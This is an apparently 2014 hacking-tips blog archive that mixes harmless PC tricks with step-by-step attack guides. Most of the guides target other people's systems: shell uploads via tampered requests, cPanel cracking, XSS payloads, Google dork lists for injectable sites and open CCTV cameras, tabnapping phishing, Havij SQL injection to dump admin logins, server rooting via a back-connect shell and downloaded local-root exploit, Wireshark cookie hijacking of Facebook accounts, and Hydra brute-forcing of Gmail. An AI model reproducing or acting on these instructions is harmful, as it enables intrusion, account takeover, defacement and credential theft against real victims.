Friday, December 19, 2014

How to increase RAM using pendrive

First of all Insert Your Pen DriveThen open"My computer"and Right click>> Then open"Properties"

Now Properties window will appear, then click on"Advanced system settings" from left side.

Then in"Advanced"Tab click on "Settings" Button appear in"Performance tab".
Again new window will appear then click on"Advanced"Tab.
In Advanced Tab there is an option of "Virtual Memory box", Then click on"Change Button".

Process of Increasing Virtual RamAfter click Change Button"Virtual settings"will appear.Now unchecked the box of "Automatically Manage Page size feature"Then in Custom  size Add Your Pen Drive current same in below format.

Note:-If Your Pen Drive is ofSize 4Gb then always add 10Mb less from current available size.

As i am using pen drive of size 4Gb and current space available is 3700 Mb then use 3690 minimum approx or remove more as you can because it better of device safety.Now Add same "Value" in both boxes and click on Apply button.

Restart Your PC or Laptop and Now pen drive work as"Virtual Ram".

Tuesday, December 16, 2014

How to upload shell using temper data firefox addon

Some websites don't allow uploading files other than images so in such a situation shell uploading is a problem because we can't upload any php or asp shell file.So we can upload shell by tempering HTTP headers

Requirements:*.Mozilla Firef0x*.Tampe Data add-onTemper Data:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Mozilla FireFox:http://www.mozilla.org/en-US/firefox/new/

1.Open Website's Admin Panel...
2.Change Your Shell ExtensioN t0.jpeg or .jpg or .gif
3.Now open y0ur Tamper Data And Click 0n Start Tampering...

4.Now goto Upload 0pt10n` and upload y0ur Shell As shell.jpg

5. Windows Will Pop-UP.--- Tamper - Submit - Abort REQUESTClick 0n TamperAt Yewr Right Side Copy All Text fr0m POST DATA BOXPaste All text in notepad..
.
6.Now Press CTRL + F, a search Text field will appear in your firefox browser's lower left.
7.Search For Shell.jpg8.Edit You Shell Extension to .php then copy it paste it on post data box And Click On Submit...
.
9.Congrats your shell has been uploaded succesfully.
10.Now in image gallery where you have uploaded shell, u will see many images.Right click on your shell image and click on "copy image location".
Now paste this url in your browser bar.Your shell will open up for U.

Monday, December 15, 2014

Top virtualiation software

1.vmware
2.virtualbox
3.vmlite
4.microsoft virtual pc
5.hyper-v
6.paragaon virtual

Sunday, December 14, 2014

Batch file programming book download

Download link

http://www.mediafire.com/download/r8wtv655ayaob7s/Batch-files-Programming+By+Softronicinfo.Blogspot.com.pdf

Trace indian mobile number

http://www.indiatrace.com/trace-mobile-number-location/trace-mobile-number.php

How to scan website using vega webscanner

Now go to theApplication>Kali Linux>Web Applications>Web Vulnerability Scanner> select the Vega or Simply type the command vega on the terminal
Now click on the Scan and select the option Start the New scanNow enter you target website that you want to scan
Now you have the two options Injection Modules and . Select modules do you want to run. For example if you want to know only XSS injection then just check it and uncheck other option. and click on the Next.
here you can configure cookies and authentication identity or leave it blank. Click on the Next Now click on the Finish to start the scan.
After completing the scan it will show you the available vulnerability in your target website with the High , Medium , Low and Info categories.like in the above result, it,s showing the Cross-site vulnerability.
so click on the cross-site scripting tab. in the right paneit will show you Classification,resources and method of particular vulnerability.Now click on the Request tab to see the more details about vulnerability.
So, enjoy the Vega Web Vulnerability Scanner in Kali Linux.

Trace wifi hacker using moocher hunter software

Download software
http://www.techspot.com/downloads/6215-moocherhunter.html

Monday, November 17, 2014

How to open what's app crypt7 backup format

Now download WhatsApp Xtract tool.
Extract the content in WhatsApp_Xtract to a New Folder.
Now you need to download Python 32bit or 64bit version depending on your system architecture and install it for the process of decryption of  crypt file.
Make sure you install Python under C:Program Files\PythonThen run pyCrypto.bat as admin.pycrypto download 5mb file via a net.
Now drag one of the databases at /sdcard/WhatsApp/Databases toWhatsApp_xtract_drag’n’drop_database(s)_here file in Xtractor folder.

After the process is finished, your default browser will open up the conversations you made.

Note : Sometimes in the end import Error would occur. In those cases just uninstall and install Python in C: instead of C:Program Files Python

Cyber Forensic software

Digital Cyber Forensic Software

Www.paraben.com

Thursday, November 6, 2014

How to Invisibly Execute BAT File in the Background:

How to Invisibly Execute BAT File in the Background:
1. Let say I will ping google.com byutilizing BAT script.ping www.google.com and then save as ping.bat

2. When we double click the ping.bat we've just created, a command prompt window will popped out and pinging google.com.and the window will automaticaly closed after the execution is complete.

3. We will utilize Windows Script Host RUN method to invisibly execute BAT file in the background

This is the scriptSet WshShell = CreateObject("WScript.Shell")WshShell.Run chr(34) & "C:\ping.bat" & Chr(34), 0Set WshShell = Nothing
save the script as hidden
.vbs with.vbsextension.
4. I've modified the BAT script a little bit, because we need to check whether the script was successfully executed or not.
ipconfig > result.txt all IP configuration result will be saved into result.txt file.
5. When we execute the hidden.vbs, no window popped out and if our script was successfully executed in the background, in ourfolder location should have a new file result.txt contained with information about windows ip configuration.
Hope it's useful

Useful for XSS learners

Useful for XSS learners victim.com/search.php?query="> victim.com/search.php?query=abc//abc">alert(/hello world/); victim.com/search.php?query=000">alert(1337);// victim.com/search.php?query=pwned");alert(/pwned/);// victim.com/search.php?query=pwned//">

How to crack cpanal password

Today i'm going to show you how to crack Cpanel. :D

To crack Cpanel, you must have :SHELLed Site               Cpanel Cracker  if you're using our shell, there already a cpanel cracker :POkay,

let's get it started :)
Procedure1- Uploadcp.phpintoyour shell.

2- Scroll down, click onUserand you will get something like this,You will get all the username of Cpanel2- Copy the Username and Password from your dictionary and paste in theUserandPasscolumn

3- Click start and waitthem cracked. :D4- You will get the result in the next page.DONE!5. You can login at into the Cpanel atwww.example.com:2082:)

That's all my tutorial

Sunday, October 5, 2014

Google secrets::::>>>>>>

method 1
?ww.google.com

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.



method 2
?ww.google.com

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

Saturday, October 4, 2014

Decompile android app using Andro chef docompiler::>>>

Decompile android app using Andro chef docompiler
android structure is like=>>

apk>dex>class>jar

1.first download andro chef decompiler from google
2. install andro chef software in your window
3.open and browse one android app and select output location for decompiling app
4.click decompiling button it take few minute
5.when complete decompiling then exract executable jar file and then folder create it contain all jar file
6.bingo

Thursday, October 2, 2014

How to hack CCTV camera using google dork

I will show you some queries, which you will find very helpful. You can use it on google and find some live footage.

inurl:"/view/view.shtml"
inurl:"/view/index.shtml"
inurl:"/view.shtml"
inurl:"ViewerFrame?Mode=" //this page is in the form of functions used in CCTV
innurl:"MultiCameraFrame?Mode="
inurl:"/home/homeJ.html"
inurl:"control/userimage.html"
inurl:"indexFrame.shtml"
inurl:"index.shtml"
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
inurl:"view/view.shtml?videos="
inurl:"viewerFrame?Mode=Refresh"

Yes, you have to just type these terms in search area and you click in these url's only where you find this search term.

Here you will get all search result in which url contains that page which is having live footage of CCTV camera.

CCTV camera hacking google dork

I will show you some queries, which you will find very helpful. You can use it on google and find some live footage.
inurl:"/view/view.shtml"
inurl:"/view/index.shtml"
inurl:"/view.shtml"
inurl:"ViewerFrame?Mode=" //this page is in the form of functions used in CCTV
innurl:"MultiCameraFrame?Mode="
inurl:"/home/homeJ.html"
inurl:"control/userimage.html"
inurl:"indexFrame.shtml"
inurl:"index.shtml"
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
inurl:"view/view.shtml?videos="
inurl:"viewerFrame?Mode=Refresh"

-: Chat with Friends through ms dos Command Prompt :-

1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".
4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) Now, type the IP Address of the computer you want to contact and press enter

7) Now all you need to do is type your message and press Enter.
Start Chatting.......!

Change Your FB Account’s Language To Hackers Language:-

First Login to your Facebook account
Now go to the account setting
then go language Now select the 'Leet Speak' from the drop-down menu and click
'Save Changes'.
Now you can see the Hacker's Language in your Facebook
account

Image Uploader Vulnerability :-

Just go to goole.com and type the string

Google dorks

inurl:"default_image.asp"
inurl:"default_imagen.asp"
inurl:"/box_image.htm"

You'll got a upload option after clicking on link that you got in google serach
results
Now select your deface, or shell and upload it =)

supported foramts : shell.asp;.jpg, shell.php;.jpg, .gif, .jpg, .png, .pdf, .zip .html
.php

you can use Tamper data too...

Moxiecode File Browser Vulnerability :-

First Of all Enter This Google Dork:
intitle:Moxiecode File browser filetype:php

select Site U wann Deface from search results
The Exploit url will be like this

http://[site]/../../js/tiny_mce/plugins/filemanager/upload.php

Note: Educational Purpose Only.

After Going to This page see icons in header of page, serach for upload
new file icon.
after clicking on Upload new file icon you'll see a new pop up for upload new files
for Preview your uploaded file go to : site.com/images/urfile if you uploaded a
image
and if you have uploded .html file see it here

site.com/files/deface.html
or
http://[site]/../../js/tiny_mce/plugins/filemanager/files/deface.html

Sunday, September 14, 2014

Google Dork List

/* Google Dork List*/
/* Provided by swapnil(cyberdude) */

trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=

Saturday, September 13, 2014

Add all Friends in Facebook Groups by Single Click
1=Firstly open Google chrome
2=Now Open your Facebook group in which you want to add your friends
3=Then Click F12
4=and click on console
5=Now Paste scrip…

scrip link (http://addallfriends.fun2pk.com/db/scrip/add%20all%20friends%20in%20group.txt)


6=Then press Enter
7=After then to hide box press again F12


detail & tutorial
(http://addallfriends.fun2pk.com)

Friday, September 12, 2014

Hack To Set wallpaper In Pen Drive

Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background. For that you need the following code:-

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=hack.bmp
IconArea_Text=0×00000000

Copy and paste it in a notepad file, and specify the image file name (here it is hack.bmp), then save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.
Refresh and view the background.
Now every time when you open your pendrive it will show background wallpaper.

How TO Trace An Email :-


So here is the method of tracing the exact location from the
email sent.I am showing the email tracing on yahoo here but
gmail and other mail providing services have same concept.

Step 1:-First open up your email account and click on your
inbox.
Step 2:-Now Select any email that you want to trace
Step 3:-After Opening scrool the mail at the end and in right
corner you will see a option FULL HEADER click on it
Have a close eye on these contents

1. Received From: - 127.0.0.1(EHLO mail-qy-f200.google.com)
(209.85.221.200) The IP address at last is the real IP address of
the person who is sending this mail.

2. To see the proper location of this IP address Go to
www.whatismyip.com or www.whois.domaintools.com .These
websites help you to find the whole detail and satellite images of
the ISP location from the Email was sent.

Matrix Effect :-


Not much to explain, just follow the stepsand
see the amazing matrix effect happen in your
DOS window:
Open Notepad.
Copy the below mentioned text in your
notepad file:
@echo off
color 02
:start
echo %random% %random% %random%
%random% %random% %random%
%random% %random% %random%
%random%
goto start
Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix
effect right before your eyes!

Tabnapping:-





Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account
and you will be using phishing method with tab napping then you can hack account. Actually
Tab Napping is a script which you put into a site/blog and when the user visit your website/blog
and read your article or play game or watch video, when user goto other tab in browser which
contain other website like youtube,google etc and came back to your website then your
website will be redirected to the phishing page and telling them to login with
facebook/gmail/yahoo account to continue.When user enter login information he/she will be
back to your page and user password will be send to you.
So lets see how to hack facebook account using tab napping trick.
Steps:
1) First of all you have a web hosting (website) and if you don't have your own website then
create Free website with following website :
www.000webhost.com
www.host1free.com
www.my3gb.com
or you can search on google and create an account.
2) Now download the script and phishing pages from google
3) Extract it and you will see the files and folders :
4) Upload all the files and folders to your website.
and link send your friend
BINGO

How To Publish FB Status Empty :-


Login in Your Facebook than click on update
status To post an empty status update write (or
copy and paste) the following code: @[2:2: ]

Saturday, August 9, 2014

Hide Files Behind Image.

1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in.RAR format.With the help of the WinRAR.
3. And most important is thatpaste both the files on desktop. You may do this anywhere instead of desktopif you have some basic understanding of command line.
4. Now open cmd by going toStart>Accessories>Command Prompt and type following commands in it.
cd desktop
5. After that type command given below.
Copy /b imagename.jpg+ filename.rar = finalimage.jpg
6. Here replace imagename, filename and finalimage with your image and file names.
NOTE: According to data the size of the image also increases.
1.How to see the data behind the image?
*.Open the image with WinRAR and you will even see the file hidden

How to hack a website using SQL Injection Havij

How to hack a website using SQL Injection Havij :-
Just Follow these easy steps :-
1) First download havij
2) Run Havij SQL Injection software and copy and
paste vulnerable website link
3) Now click in the “Analyze” button
4) Then It shows some messages there. Be alert on
it and be show patience for sometime to find it’s
vulernable and type of injection and if db server is
mysql and it will find database name.Then after get
it’s database is name like xxxx_xxxx
5) Then Move to another operation to find tables
by clicking “tables” as figure shown. Now click “Get
tables” Then wait some time if needed
6) After founded the tables ,you can see there will
be “users” Put mark on it and click in the ” get
columns ” tab
7) In that Just put mark username and password
and click “Get data”
8) Finally you got now username and password of
the admin…

Rooting a Server : Learn Ethical Hacking

Root is the Administrator of all server. If someone
got root access he
can do anything with server like delete and copy
anything on server ;
can deface all the home pages (massive deface ).
We can't talk about root on windows. That enough
for beginner
because if I talk about the root I need another
book. So, I guess now
we know the importance of root access and why
we try to got root.
How to get Root?
There are 3 ways to get ROOT on server :
1 – With local Root.
2 – With SQL by reading same important files on
it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will
explain the other ways
soon in some other post.
OK, let's back to work.
After Uploading your shell on server and getting
the localroot you
will do a back connect and run the localroot to
Get root . This is a
small idea how it work in the next step you will
see how to
find localroot and run it to get root access .
How to Search Local root?
First of all we you need to know what version of
Kernel.
You can know that from your shell, for example
this version is 2.6.18 -
2012
Go to EXECUTE on your shell and write "uname -
a". You will get the
same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db,
packetstormsecurity,
vfocus, injector, etc who provides these local
roots. One more thing to
notice is, that there exists two types of local
roots :
1. Local.C : which are not ready.
2. Local : ready to use.
How to get Root access?
First you need a shell with a Back Connect option
like this :
Enter your "Public IP Address" in SERVER, port you
want to connect on
and leave it Perl this time, and Finally connect.
So now you must receive the back connect with a
Tool named netcat u
can download it from the
net. After that open your terminal if you are under
linux or CMD if you
are under Windows. I will explain only Linux, and
for Windows, its all
the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 - unzip local-Root.zip
4 - chmod 777 local.c
5 - now to change the local-root from local.c >
local
gcc local.c -o local Then you will find local.c
transformed to local
6 - chmod 777 local
7 - ./local to local root work
8 – su
then see your id uid=0(root) gid=0(root)
groups=0(root)
Getting UID=0 means, u had got root priviledges
and hence can do
variety of stuff on the remote server say Mass
deface, dump database,
redirect sites, change content, etc etc

Friday, August 8, 2014

How To Setup A Vitual Machine

1)Download VirtualBox v2.2.4 from here (works for all Windows OSes as well as 32-bit and 64-bit)
http://download.virtualbox.org/virtualbo...78-Win.exe
2)Install it like you would install any other application, no technical stuff here.
3)Open it up and click the "New" button on the top-left.
4)Click "Next", then enter a name for your virtual PC, and select the relevant operating system (Windows in this case) and Version (XP or Vista, which ever you want).
5)Now you get to assign how much RAM you want the virtual PC to have. You shouldn't assign more then 50% of your actual RAM as this might give a "low host memory" error while you're running the VM. I personally have 2GB and I installed XP, so I assigned 768MB memory to it, which is enough for XP to run smoothly. If you have Vista, you're gonna need at least 1.5 GB to run it smoothly.
6)Now you have to create a virtual hard disk, where the virtual OS, and all other files will go. Obviously as this is your first time, select "Create new hard disk"
7)Hit "Next" the first time, then you have to select the type of HD you want to create.
Dynamically expanding storage:In this, you assign a maximum size to your virtual HD, but it doesn't take up that much disk space as soon as you create it. It expands as the virtual PC demands more space. But it will stop expanding once it reaches its max size (which you specify in a later step).
Fixed storage:Simple; you assign, say, 5GB of space, and a 5GB file is created. All your virtual data will be stored in here.
I personally recommend you to choose the Dynamically expanding option, since it saves disk space as long as you don't need it.
Select your desired option, and click "Next"
8)This virtual hard disk is actually just a single file with a .vdi extension, you don't need a separate partition for it or anything. By default, this vdi file will be created in your system folder (C drive in most cases), but if you want to save it somewhere else, then click on the small folder icon to the right of the name bar and choose a desired location.
Also assign a max size for your virtual hard disk. Choose how much you want, and how much you have to spare. For an XP install, with some basic apps like Firefox and a bunch of hacking tools, 3.5GB should be enough. For Vista, you'll need at least 6-7GB.
9)Review the specs of the virtual HD and press "Finish" Hit "Finish" again.
10)Now just one last step: Your virtual machine should appear in the left pane. Select it, and click "Settings" Go into the "CD ROM" tab on the left, check "Mount CD/DVD drive"
Check "Mount CD/DVD drive" if you want to install it from a disc (also insert the disc). Alternatively, select "ISO Image File" if you want to install from an ISO file, browse and select the relevant OS ISO.
11)In the "General" tab, you can also assign the amount of video memory you want the guest OS to have (the OS installed on a VM is called a guest OS). Be default, its 4MB which is pretty low. Again, don't assign more then 50% of your real VRAM. I personally have 512MB and I assigned 128MB. Also check the "Enable Hardware Acceleration" option below if you have a dedicated gfx card (not ones that come built-in to the motherboard).
12)Click OK, and you're done. Select the VM from the left pane, and hit "Start". Install the OS as you would install it on a real PC, there's no difference.
13)Once you've done installing, there are few things to do. Firstly, go into the "Devices" menu of the VM window and click "Install Guest Additions". This is a 20MB ISO which will add more functionality to your VM like automatic mouse pointer integration and allow you to set a higher screen resolution for example.
14)If you've installed XP, then see whether or not the internet is working. There was a bug in v2.2.0 (the version I'm using) where internet via DSL and LAN didn't work with NAT. This has probably probably been fixed with the new v2.2.4, but in case it hasn't been:
a) Download this DLL file:
http://www.mediafire.com /?0qt3z2ozjyq(it is also present on Sun's website, but the link was very obscure so I just uploaded it elsewhere)
b) Copy it, and paste it in the VirtualBox folder i.e. C:\Program Files\Sun\xVM VirtualBox
Make a back-up of the original DLL just to be safe
c) Check if it works, if it still doesn't go into the VM's settings again, and in the network tab, make sure "Enable Network Adapter" is checked. If you're using LAN, also make sure that the "Attached to" is set to NAT.
d) If it still won't budge, ask for help at VirtualBox forums.

Step by Step Hacking Tutorials Log in Windows Without Password with Kon Boot:

1. First, we will make the bootable Kon Boot by using the default kon-boot installer that already provided when we buy this program, but if we use the free version, we can create the image by following the tutorial how to create bootable usb.
Choose the USB we want to use to install kon-boot from the "available USB drives" drop down list and click "Install to USB stick" when finished.
The installation process will take approximately 1 minute.
note: Make sure you choose the correct USB, because the installation process will erase all data on your USB device.
2. The Kon-boot USB now ready, we need to configure the BIOS settings to change the boot order to boot from USB. You can view our previous tutorial about changing BIOS boot order in step 5.
3. This is the preview when we successfully boot from Kon-boot USB.
4. After the Kon-boot initialization screen, it will normally boot the Windows. When we press the SHIFT key 5 times (sticky keys), we can see the command prompt pooped out with system role.
5. We can enter Windows without a password, just click the arrow and we already inside the system.

Thursday, August 7, 2014

Step by step to Reveal Asterisk Saved Passwords onMozilla Firefoxand Chrome:

1. Open ourMozilla Firefox browser,
pressALT–> clickTools–> ClickAdd-ons
2. On Add-ons page, there is a search box, type firebugon the textbox and click search, or you can go directly to this pagehttps://addons.mozilla.org/en-US/firefox/addon/firebug/. Click install if there is a pop out window asking you to install this add ons.and restart yourbrowser.
3. This is the firebug button. to activate firebug you only need to click this button and click once again to deactivate.
4. Now we try to open a website with log in page, e.g: mail.live.comand input the password. Right click on the passwordbox and choose Inspect Element.
5. Double click the type="password"and change it in to type="text".
6. The asterisk password will be shown and revealed
7. How if it is on Google Chrome browser? The steps is the same.Open the log in page, right click the password box and choose inspect element
8. Change the input type="password"to type="text".
The password is revealed.

Create Bootable USB Kali Linux on Windows

1. Download the USB Installer and Plug the USB we want to use to create the bootable usb.
2. On the USB installer window

Step 1: Choose which linux distro or O.S we want to put on our USB

step:2: Locate the .ISO file of our O.S we want to put on our USB

step 3::Select the USB drive letter. Make sure you don't choose your external hard disk check the format drive to make sure we clean up all the content of our USB
Click Create


3. A pop up alert window will appear. Make sure we check again if there's something wrong or missing. Click Yes to start the bootable usb creation process.
4. Now we need to wait for the application to accomplish the tasks. The time taken is depend with which distro or O.S we want to create.When finished, just click Close and our USB was ready to boot.

5. Now we will continue to set up the boot order from our computer BIOS to USB. The picture below was taken from my Acer Aspire one netbook.you can press F2 to go to BIOS setup or F12 to change the boot device.

6. If we choose F12, here is the preview on my netbook Change the USB HDD order into number one to boot from the USB.

7. If we choose F2 or edit from BIOS setup.

Wednesday, August 6, 2014

Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

Step 1:
Download the Wire Shark and install it.
Step 2:
Next open the wire shark and then click on
interface.
Step 3:
Next choose a interface which is received and
sending packet and click on start
Step 4:
Continue the sniffing for around like 10 minutes.
Step 5:
After a maximum 10 minute stop the sniffing by going to a capture menu.
Step6:
its important step, now filter to http. cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie.
Step 7:
Now click on it and then goto the copy > Bytes
> Printable Text only
Step 8:
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
and then open facebook. com make sure you are
not login
Step 9:
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value
into it.
Step 10
Now refresh your page so then finally you Enter
the Victim Account.

Hack Windows 7 Password Using Ophcrack

Opcrack is an open source windows password cracker based on rainbowtables. It comes with Graphicaluser interface(GUI) and runs on multiple platform such windows, linux and mac. It allows you to recover or hack windows password.
1>Download OPhcrack by Clicking following link
2>Make Bootable Pendrive/CD
3>Boot System with this Pendrive or CD
4> All Done ...Your Password'll Appear !!!
download

Tuesday, August 5, 2014

How To Crack MD5 Encrypted Hash

Cain & Able. It is virus free software that can be downloaded from
http://www.oxid.it/cain.html.
You will have the options to use a dictionary or a brute force attack with this program.
To crack a hash online, you can use a multitude of websites. Some of my favourites include:http://www.md5decryp ...
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://www.md5-decrypter.com
http://www.md5encryption.com

How to Crack a Gmail Account Password in Kali Linux

Now openTerminal and enter the command Hydra, it will show you all the Syntax , Options and examples.
For Gmail Password cracking Syntex are like below :-

hydra -S -l -P -e ns -V -s 465 smtp.gmail.com smtp

Like i want to hack my own one Gmail account. so my command will be like below

